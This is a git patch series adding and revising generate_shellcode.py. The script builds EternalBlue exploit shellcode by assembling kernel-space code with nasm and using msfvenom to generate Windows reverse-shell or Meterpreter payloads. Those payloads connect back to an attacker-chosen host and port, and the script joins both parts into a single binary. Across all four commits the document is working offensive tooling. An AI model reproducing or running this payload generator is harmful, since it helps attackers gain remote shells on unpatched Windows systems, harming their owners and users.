From 93028805010ce0714cb60a7611f482c2b7400c6b Mon Sep 17 00:00:00 2001 From: phi10s <35280353+phi10s@users.noreply.github.com> Date: Wed, 27 Mar 2019 18:50:33 -0400 Subject: [PATCH 1/4] Create generate_shellcode.py --- shellcode/generate_shellcode.py | 45 +++++++++++++++++++++++++++++++++ 1 file changed, 45 insertions(+) create mode 100644 shellcode/generate_shellcode.py diff --git a/shellcode/generate_shellcode.py b/shellcode/generate_shellcode.py new file mode 100644 index 0000000..16bd0f0 --- /dev/null +++ b/shellcode/generate_shellcode.py @@ -0,0 +1,45 @@ +#!/usr/bin/python + +'''This script generates shellcode for use with EternalBlue exploits, +by utilizing msfvenom to generate user-space code, then concatenating +it with the supplied kernel-space code. It gives the user a choice of +a couple payloads each for x86 and x64 architectures.''' + +__author__="phi10s" + +import argparse +import subprocess +import sys + +parser = argparse.ArgumentParser() +parser.add_argument("lhost", help="Local IP address for revere connection") +parser.add_argument("lport", help="Local port number") +parser.add_argument("outfile",help="Name for the resulting shellcode binary") +parser.add_argument("-p","--payload", choices=["s","n","m"], default="n", + help="Choose reverse shell payload\ns = staged\nn " + + "= non-staged\nm = meterpreter\n(Default = non-staged)") +parser.add_argument("-a","--arch", help="Target architecture (Default = x86)", + choices=["x86","x64"], default="x86") +args = parser.parse_args() +# print(args) + + +if args.arch == "x64": + x64_payloads = {"s":"windows/x64/shell/reverse_tcp","m":"windows/x64/meterpreter/reverse_tcp", + "n":"windows/x64/shell_reverse_tcp"} + msfpayload = x64_payloads[args.payload] + genshellcode = "msfvenom -p " + msfpayload + " -f raw " + "-o userspacesc.tmp " \ + + "EXITFUNC=thread " + "lhost=" + args.lhost + " lport=" + args.lport + subprocess.call(genshellcode,shell=True) + subprocess.call("cat eternalblue_kshellcode_x64 userspacesc.tmp > " + args.outfile, shell=True) + subprocess.call("rm userspacesc.tmp",shell=True) +else: + x86_payloads = {"s":"windows/shell/reverse_tcp","m":"windows/meterpreter/reverse_tcp", + "n":"windows/shell_reverse_tcp"} + msfpayload = x86_payloads[args.payload] + genshellcode = "msfvenom -p " + msfpayload + " -f raw " + "-o userspacesc.tmp " \ + + "EXITFUNC=thread " + "lhost=" + args.lhost + " lport=" + args.lport + subprocess.call(genshellcode,shell=True) + subprocess.call("cat eternalblue_kshellcode_x86 userspacesc.tmp > " + args.outfile, shell=True) + subprocess.call("rm userspacesc.tmp",shell=True) +print("\n[*] Generated " + msfpayload + " payload") From a8d0174dbe6f6d51e989e84cc758c05bdf091e67 Mon Sep 17 00:00:00 2001 From: phi10s <35280353+phi10s@users.noreply.github.com> Date: Wed, 27 Mar 2019 19:12:19 -0400 Subject: [PATCH 2/4] Update generate_shellcode.py --- shellcode/generate_shellcode.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/shellcode/generate_shellcode.py b/shellcode/generate_shellcode.py index 16bd0f0..99a607a 100644 --- a/shellcode/generate_shellcode.py +++ b/shellcode/generate_shellcode.py @@ -12,7 +12,7 @@ import sys parser = argparse.ArgumentParser() -parser.add_argument("lhost", help="Local IP address for revere connection") +parser.add_argument("lhost", help="Local IP address for reverse connection") parser.add_argument("lport", help="Local port number") parser.add_argument("outfile",help="Name for the resulting shellcode binary") parser.add_argument("-p","--payload", choices=["s","n","m"], default="n", From 1fdb812b49a44e3fece3f6adc3212b5bad61459e Mon Sep 17 00:00:00 2001 From: phi10s <35280353+phi10s@users.noreply.github.com> Date: Wed, 27 Mar 2019 19:35:27 -0400 Subject: [PATCH 3/4] Update generate_shellcode.py --- shellcode/generate_shellcode.py | 16 +++++++++++----- 1 file changed, 11 insertions(+), 5 deletions(-) diff --git a/shellcode/generate_shellcode.py b/shellcode/generate_shellcode.py index 99a607a..3a17f1b 100644 --- a/shellcode/generate_shellcode.py +++ b/shellcode/generate_shellcode.py @@ -23,13 +23,19 @@ args = parser.parse_args() # print(args) - +print("\n[*] Assembling kernel space shellcode binary\n") +subprocess.call("nasm -f bin eternalblue_kshellcode_x86.asm", shell=True) +subprocess.call("nasm -f bin eternalblue_kshellcode_x64.asm", shell=True) +print("\n[*] Invoking msfvenom to generate userspace shellcode binary\n") if args.arch == "x64": - x64_payloads = {"s":"windows/x64/shell/reverse_tcp","m":"windows/x64/meterpreter/reverse_tcp", + x64_payloads = {"s":"windows/x64/shell/reverse_tcp", + "m":"windows/x64/meterpreter/reverse_tcp", "n":"windows/x64/shell_reverse_tcp"} msfpayload = x64_payloads[args.payload] - genshellcode = "msfvenom -p " + msfpayload + " -f raw " + "-o userspacesc.tmp " \ - + "EXITFUNC=thread " + "lhost=" + args.lhost + " lport=" + args.lport + genshellcode = "msfvenom -p " + msfpayload + \ + " -f raw " + "-o userspacesc.tmp " \ + + "EXITFUNC=thread " + "lhost=" + args.lhost \ + + " lport=" + args.lport subprocess.call(genshellcode,shell=True) subprocess.call("cat eternalblue_kshellcode_x64 userspacesc.tmp > " + args.outfile, shell=True) subprocess.call("rm userspacesc.tmp",shell=True) @@ -42,4 +48,4 @@ subprocess.call(genshellcode,shell=True) subprocess.call("cat eternalblue_kshellcode_x86 userspacesc.tmp > " + args.outfile, shell=True) subprocess.call("rm userspacesc.tmp",shell=True) -print("\n[*] Generated " + msfpayload + " payload") +print("\n[*] Generated " + msfpayload + " payload\n") From 6a42c295e0143301908b090d724c6b51eeb902e1 Mon Sep 17 00:00:00 2001 From: phi10s <35280353+phi10s@users.noreply.github.com> Date: Wed, 27 Mar 2019 19:40:02 -0400 Subject: [PATCH 4/4] Update generate_shellcode.py --- shellcode/generate_shellcode.py | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/shellcode/generate_shellcode.py b/shellcode/generate_shellcode.py index 3a17f1b..f5b0512 100644 --- a/shellcode/generate_shellcode.py +++ b/shellcode/generate_shellcode.py @@ -1,9 +1,9 @@ #!/usr/bin/python -'''This script generates shellcode for use with EternalBlue exploits, -by utilizing msfvenom to generate user-space code, then concatenating -it with the supplied kernel-space code. It gives the user a choice of -a couple payloads each for x86 and x64 architectures.''' +'''This script generates formatted shellcode for use with EternalBlue exploits, +by assembling the kernel shellcode, then utilizing msfvenom to generate +user-space shellcode, then concatenating it with the kernel-space code. It +gives the user a choice of a couple payloads each for x86 and x64 architectures.''' __author__="phi10s"